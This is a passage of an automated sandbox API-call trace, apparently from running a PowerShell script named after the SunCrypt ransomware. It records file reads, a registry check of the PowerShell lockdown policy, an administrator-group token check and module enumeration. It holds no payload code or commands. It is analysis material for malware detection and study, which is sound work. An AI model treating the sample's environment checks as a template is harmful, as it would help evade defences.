[0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13b000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13c000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.289] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13d000 [0081.289] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13e000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x13f000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, 
lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.290] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x140000 [0081.290] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.293] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x141000 [0081.293] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.293] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x142000 [0081.293] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x143000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x144000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, 
lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x145000 [0081.294] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.294] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x146000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.295] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x147000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.295] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x148000 [0081.295] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.296] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x149000 [0081.296] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, 
lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14a000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14b000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.297] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14c000 [0081.297] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.298] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14d000 [0081.298] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.298] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14e000 [0081.298] ReadFile (in: hFile=0x4bc, 
lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.299] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x14f000 [0081.299] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.300] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x150000 [0081.300] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.300] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x151000 [0081.300] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x152000 [0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x153000 
[0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.301] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x154000 [0081.301] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x155000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x156000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.302] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x157000 [0081.302] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.303] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x158000 [0081.303] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.304] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x159000 [0081.304] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15a000 [0081.305] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15b000 [0081.305] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.305] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15c000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.306] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15d000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.306] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15e000 [0081.306] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.307] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x15f000 [0081.307] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.308] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x160000 [0081.308] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.308] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x161000 [0081.308] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.309] SetFilePointer (in: 
hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x162000 [0081.309] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.309] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x163000 [0081.309] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x66a, lpOverlapped=0x0) returned 1 [0081.310] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16366a [0081.310] ReadFile (in: hFile=0x4bc, lpBuffer=0x1da9dca, nNumberOfBytesToRead=0x196, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1da9dca*, lpNumberOfBytesRead=0x4ebf208*=0x0, lpOverlapped=0x0) returned 1 [0081.310] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x16366a [0081.310] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x0, lpOverlapped=0x0) returned 1 [0081.360] NtQuerySystemInformation (in: SystemInformationClass=0xa4, SystemInformation=0x4ebf170, Length=0x20, ResultLength=0x4ebf1e0 | out: SystemInformation=0x4ebf170, ResultLength=0x4ebf1e0*=0x0) returned 0xc0000003 [0081.360] GetSystemInfo (in: lpSystemInfo=0x4ebf1ec | out: lpSystemInfo=0x4ebf1ec*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, 
lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0081.360] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x4ebf17c | out: phkResult=0x4ebf17c*=0x468) returned 0x0 [0081.360] RegQueryValueExW (in: hKey=0x468, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x4ebf198, lpData=0x0, lpcbData=0x4ebf194*=0x0 | out: lpType=0x4ebf198*=0x0, lpData=0x0, lpcbData=0x4ebf194*=0x0) returned 0x2 [0081.360] RegCloseKey (hKey=0x468) returned 0x0 [0081.361] CloseHandle (hObject=0x4bc) returned 1 [0081.384] CoCreateGuid (in: pguid=0x4ebeb80 | out: pguid=0x4ebeb80*(Data1=0xeafd3efa, Data2=0x55e2, Data3=0x4770, Data4=([0]=0xb4, [1]=0x1f, [2]=0xae, [3]=0x96, [4]=0x8b, [5]=0xd8, [6]=0xe2, [7]=0x55))) returned 0x0 [0082.901] CoCreateGuid (in: pguid=0x4ebf2b0 | out: pguid=0x4ebf2b0*(Data1=0x862ab76, Data2=0xd2c0, Data3=0x485e, Data4=([0]=0x89, [1]=0xfd, [2]=0x2a, [3]=0x3d, [4]=0x99, [5]=0xf4, [6]=0x2d, [7]=0xbf))) returned 0x0 [0082.919] GetCurrentProcess () returned 0xffffffff [0082.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x4ebf27c | out: TokenHandle=0x4ebf27c*=0x4bc) returned 1 [0082.920] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x4ebf27c | out: TokenInformation=0x0, ReturnLength=0x4ebf27c) returned 0 [0082.920] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4254698 [0082.920] GetTokenInformation (in: TokenHandle=0x4bc, TokenInformationClass=0x8, TokenInformation=0x4254698, TokenInformationLength=0x4, ReturnLength=0x4ebf27c | out: TokenInformation=0x4254698, ReturnLength=0x4ebf27c) returned 1 [0082.921] LocalFree (hMem=0x4254698) returned 0x0 
[0082.921] DuplicateTokenEx (in: hExistingToken=0x4bc, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x4ebf284 | out: phNewToken=0x4ebf284*=0x468) returned 1 [0082.921] CheckTokenMembership (in: TokenHandle=0x468, SidToCheck=0x556e010*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x4ebf294 | out: IsMember=0x4ebf294) returned 1 [0082.921] CloseHandle (hObject=0x468) returned 1 [0082.932] QueryPerformanceCounter (in: lpPerformanceCount=0x4ebf290 | out: lpPerformanceCount=0x4ebf290*=1640574855353) returned 1 [0082.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0082.932] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0082.932] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4ebef7c) returned 1 [0082.932] GetFileAttributesExW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1" (normalized: "c:\\users\\5alr3u30d3\\desktop\\suncrypt_26_01_2021_1422kb.ps1"), fInfoLevelId=0x0, lpFileInformation=0x4ebf240 | out: lpFileInformation=0x4ebf240*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x53a00f00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0x53a00f00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0x9a57cd00, ftLastWriteTime.dwHighDateTime=0x1d7599a, nFileSizeHigh=0x0, nFileSizeLow=0x16366a)) returned 1 [0082.933] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4ebef78) returned 1 [0082.933] GetFullPathNameW (in: 
lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3b [0082.933] GetFullPathNameW (in: lpFileName="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", nBufferLength=0x3b, lpBuffer=0x4265bc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5AlR3U30D3\\Desktop\\SunCrypt_26_01_2021_1422KB.ps1", lpFilePart=0x0) returned 0x3a [0082.933] GetCurrentProcessId () returned 0xfac [0082.934] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xfac) returned 0x468 [0082.934] EnumProcessModules (in: hProcess=0x468, lphModule=0x556e518, cb=0x100, lpcbNeeded=0x4ebf188 | out: lphModule=0x556e518, lpcbNeeded=0x4ebf188) returned 1 [0082.935] EnumProcessModules (in: hProcess=0x468, lphModule=0x556e624, cb=0x200, lpcbNeeded=0x4ebf188 | out: lphModule=0x556e624, lpcbNeeded=0x4ebf188) returned 1 [0082.937] GetModuleInformation (in: hProcess=0x468, hModule=0xd80000, lpmodinfo=0x556e864, cb=0xc | out: lpmodinfo=0x556e864*(lpBaseOfDll=0xd80000, SizeOfImage=0x6b000, EntryPoint=0xd8d330)) 